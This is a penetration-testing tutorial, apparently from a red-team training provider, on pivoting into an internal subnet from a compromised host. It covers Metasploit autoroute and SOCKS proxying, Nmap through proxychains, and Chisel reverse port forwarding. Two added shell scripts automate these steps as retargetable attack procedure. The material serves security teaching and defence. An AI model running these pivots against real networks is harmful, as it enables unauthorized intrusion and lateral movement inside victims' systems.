Pivoting & Tunneling
Pivoting is a technique used in penetration testing and cyber attacks where the attacker uses a compromised machine to move deeper into a network. By pivoting, an attacker can access different subnets that are not directly accessible from the attacker's original network. This allows the attacker to bypass network segmentation and access internal resources.
Introduction
Pivoting involves using a compromised host to relay traffic to other systems and subnets within the target network. This technique is essential for exploring network segments that are not directly accessible from the attacker's initial foothold. The compromised host acts as a bridge, forwarding traffic between the attacker and the internal targets.
Types of Pivoting
Network Pivoting (Layer 3):
Involves routing IP traffic through the compromised host to reach other network segments.
Utilizes routing and forwarding mechanisms.
Port Forwarding (Layer 4):
Involves forwarding specific ports from the attacker's machine to the target network through the compromised host.
Utilizes tools and techniques to forward traffic at the transport layer (TCP/UDP).
Application Layer Pivoting (Layer 7):
Involves tunneling application-specific traffic through the compromised host.
Utilizes proxies and application-level tunneling tools.
Tools Commonly Used for Pivoting
Metasploit Framework
Meterpreter
SSH (Secure Shell)
ProxyChains
SOCKS Proxy
Nmap
PowerShell Empire
Chisel
Plink (PuTTY Link)
Cobalt Strike
Impacket
FoxyProxy
MSFvenom
RDP (Remote Desktop Protocol)
Netcat
A real-world example of pivoting: an attacker on the 192.168.x.x network segment compromises a dual-homed host and uses its second network interface card (NIC) to pivot into the internal segment and move laterally there.
Pivoting to the Internal (different) subnet of the Victim Machine:
It is assumed that we have already compromised the host File02 and obtained a low-privileged (bdc\paul) Meterpreter reverse shell in MSF on Parrot OS (the attacker machine):
We can see a second, internal NIC on the victim system File02 with the IP address 172.16.69.4:
Since our goal is to reach the victim's internal segment (172.16.69.x), we need to add a route to that subnet through the Meterpreter session; this is done in MSF:
Background Session 2:
Use the autoroute post module below to add the route:
Route added successfully. To use external tools such as Nmap over this route, start a SOCKS server with the auxiliary/server/socks_proxy module. Change the default SRVPORT (1080) to 9050, the port used in the default proxychains configuration.
Commands:
Use the netstat command to verify that the proxy is listening:
Scan the target machine using Nmap through proxychains. No proxychains configuration change is needed, because its default configuration already points at 127.0.0.1:9050. Note that SOCKS carries only TCP, so use a full-connect scan (-sT) with -Pn and -n; SYN scans, ICMP pings and UDP probes do not traverse the proxy.
We got a success :)
We can now see the open ports on hosts in the internal subnet (172.16.69.0/24) by scanning through File02:
Output of File01 (172.16.69.32):
Output of Backup_dc (BDC, 172.16.69.70), the Active Directory domain controller:
Please check/modify your proxychains config file before doing any activity:
nano /etc/proxychains4.conf
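The autoroute, socks_proxy and proxychains steps above are shown in screenshots; the script below is an added example (not the write-up's own commands) that captures the same procedure in a form that can be re-run against another target. The session id (2), the internal subnet (172.16.69.0/24), the SOCKS port (9050) and the output directory are assumptions taken from the walkthrough and can be overridden from the environment.

```shell
#!/usr/bin/env bash
# Added example, not the write-up's own commands: drive the autoroute ->
# socks_proxy -> proxychains pivot from above as a script. Assumed values
# (override via environment): Meterpreter session 2, internal subnet
# 172.16.69.0/24, SOCKS on 127.0.0.1:9050, files written under /tmp/pivot.
set -eu

SESSION="${SESSION:-2}"
SUBNET="${SUBNET:-172.16.69.0}"
NETMASK="${NETMASK:-255.255.255.0}"
SOCKS_PORT="${SOCKS_PORT:-9050}"
OUT="${OUT:-${TMPDIR:-/tmp}/pivot}"

# msfconsole resource script: route the internal subnet through the session,
# then start the SOCKS server on the port proxychains uses by default.
# VERSION 4a matches the "socks4" proxy type in the stock proxychains config;
# SRVHOST 127.0.0.1 keeps the pivot off the attacker's external interfaces.
write_msf_rc() {
  mkdir -p "$OUT"
  cat > "$OUT/pivot.rc" <<EOF
use post/multi/manage/autoroute
set SESSION $SESSION
set SUBNET $SUBNET
set NETMASK $NETMASK
run
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT $SOCKS_PORT
set VERSION 4a
run -j
EOF
  printf '%s\n' "$OUT/pivot.rc"
}

# Minimal proxychains4 config pointing at the MSF SOCKS server (same content
# as the stock ProxyList entry, so this doubles as the "check your config" step).
write_proxychains_conf() {
  mkdir -p "$OUT"
  cat > "$OUT/proxychains.conf" <<EOF
strict_chain
quiet_mode
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks4 127.0.0.1 $SOCKS_PORT
EOF
  printf '%s\n' "$OUT/proxychains.conf"
}

# Given the output of "ss -lnt" (or "netstat -lnt"), report whether anything
# is listening on the SOCKS port. Returns 0 if yes, 1 if not.
socks_listening() {
  printf '%s\n' "$1" | grep -Eq "[:.]${SOCKS_PORT}([[:space:]]|\$)"
}

# Scan through the proxy. SOCKS carries TCP only, so: no ping (-Pn), no DNS
# (-n), full connect scan (-sT); SYN scans and ICMP never leave the attacker box.
scan_via_proxy() {
  proxychains4 -f "$OUT/proxychains.conf" nmap -n -Pn -sT --top-ports 100 "$@"
}

# Set RUN_PIVOT=1 to actually write the files and scan; otherwise only define.
if [ "${RUN_PIVOT:-0}" = "1" ]; then
  rc=$(write_msf_rc)
  write_proxychains_conf >/dev/null
  if socks_listening "$(ss -lnt)"; then
    scan_via_proxy 172.16.69.32 172.16.69.70
  else
    echo "SOCKS not up yet; start it with: msfconsole -q -r $rc" >&2
  fi
fi
```

Run it once with RUN_PIVOT=1 to generate pivot.rc, start msfconsole with `-r` on that file in another terminal, and run it again once the listener is up; the listener check reads the same ss/netstat table the write-up inspects by hand.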
Extras:
We can also connect with rdesktop to File01 (172.16.69.32) through proxychains:
Port Forwarding on a Linux Machine without SSH Credentials
Port Forwarding using Chisel:
Chisel is a very useful tool for forwarding a local port on a compromised Linux machine back to the attacker's machine.
Its great advantage is that it needs no credentials on the victim (unlike SSH): run Chisel as a server on the attacker machine, upload the same Chisel executable to the victim, and run it there as a client as shown below:
On Attacker Machine (e.g. Parrot/Kali):
On Target/Victim Machine:
Steps 3 & 4: access the newly forwarded port 8000 on the attacker machine:
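The Chisel server and client invocations above are shown only in screenshots; the script below is an added example (not the write-up's own commands) of the same reverse port forward, exposing a service bound to 127.0.0.1:8000 on the victim as 127.0.0.1:8000 on the attacker. The attacker address (10.10.14.5), the Chisel control port (8001) and the shared secret are assumptions. It also shows the `R:...:socks` variant, which gives a reverse SOCKS5 proxy that proxychains can use in place of the Metasploit socks_proxy module.

```shell
#!/usr/bin/env bash
# Added example, not the write-up's own commands: a Chisel reverse port
# forward (and, optionally, a reverse SOCKS proxy) with no SSH credentials.
# Assumed values: attacker 10.10.14.5, Chisel control port 8001, shared
# secret in CHISEL_AUTH. Run "server" on the attacker, "client" or "socks"
# on the victim, "check" on the attacker once the client has connected.
set -eu

ATTACKER="${ATTACKER:-10.10.14.5}"
CHISEL_PORT="${CHISEL_PORT:-8001}"
CHISEL_AUTH="${CHISEL_AUTH:-pivot:CHANGEME}"

# Reverse remote spec: R:<attacker-bind>:<attacker-port>:<victim-host>:<victim-port>
# Binding to 127.0.0.1 on the attacker keeps the tunnelled service off the
# attacker's external interfaces; without a bind address Chisel uses 0.0.0.0.
remote_spec() {
  printf 'R:127.0.0.1:%s:127.0.0.1:%s\n' "$1" "$2"
}

# Reverse SOCKS5 listener on the attacker side, explicitly bound to loopback.
socks_spec() {
  printf 'R:127.0.0.1:%s:socks\n' "$1"
}

# Check (on the attacker) that the forwarded port came up.
# Returns 0 = open, 1 = closed, 2 = nc not installed.
forwarded_port_open() {
  command -v nc >/dev/null 2>&1 || return 2
  nc -z -w 1 "$1" "$2" >/dev/null 2>&1
}

case "${1:-}" in
  server)
    # --reverse is required or the client's R: remotes are refused;
    # --auth stops anyone else who finds the port from using the tunnel.
    chisel server --port "$CHISEL_PORT" --reverse --auth "$CHISEL_AUTH" ;;
  client)
    # Victim side: forward victim 127.0.0.1:$3 to attacker 127.0.0.1:$2.
    chisel client --auth "$CHISEL_AUTH" "$ATTACKER:$CHISEL_PORT" \
      "$(remote_spec "${2:-8000}" "${3:-8000}")" ;;
  socks)
    # Victim side: reverse SOCKS5 on attacker 127.0.0.1:$2 (default 1080).
    chisel client --auth "$CHISEL_AUTH" "$ATTACKER:$CHISEL_PORT" \
      "$(socks_spec "${2:-1080}")" ;;
  check)
    # Attacker side: steps 3 & 4 above then use e.g. curl http://127.0.0.1:8000/
    forwarded_port_open 127.0.0.1 "${2:-8000}" && echo "127.0.0.1:${2:-8000} is open" ;;
  *)
    echo "usage: $0 server | client [attacker-port victim-port] | socks [port] | check [port]" ;;
esac
```

With the `socks` role, point proxychains at `socks5 127.0.0.1 1080` and the Nmap and rdesktop steps from the Metasploit section work unchanged against the internal subnet.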
Conclusion
Pivoting within a network is a critical technique used by attackers to move laterally and gain access to additional network segments. By exploiting compromised hosts and leveraging tools and techniques such as Metasploit, SSH tunneling, and proxy chains, attackers can bypass network segmentation and access otherwise isolated systems. Understanding these methods is essential for penetration testers to simulate real-world attack scenarios and for defenders to implement effective countermeasures.
Effective network defense strategies should include robust network segmentation, continuous monitoring, strong access controls, and regular security assessments. By doing so, organizations can reduce the risk of lateral movement and improve their overall security posture. Ensuring that security measures are in place to detect and respond to pivoting activities is crucial for maintaining the integrity and confidentiality of critical network resources.
Nowadays, Endpoint Detection and Response (EDR) solutions can detect and block many of these techniques. However, more advanced tradecraft can still evade these defenses.
These sophisticated methods are an integral part of what we teach in our live Red Teaming sessions, enabling security professionals to stay ahead of the latest threats and enhance their defensive capabilities.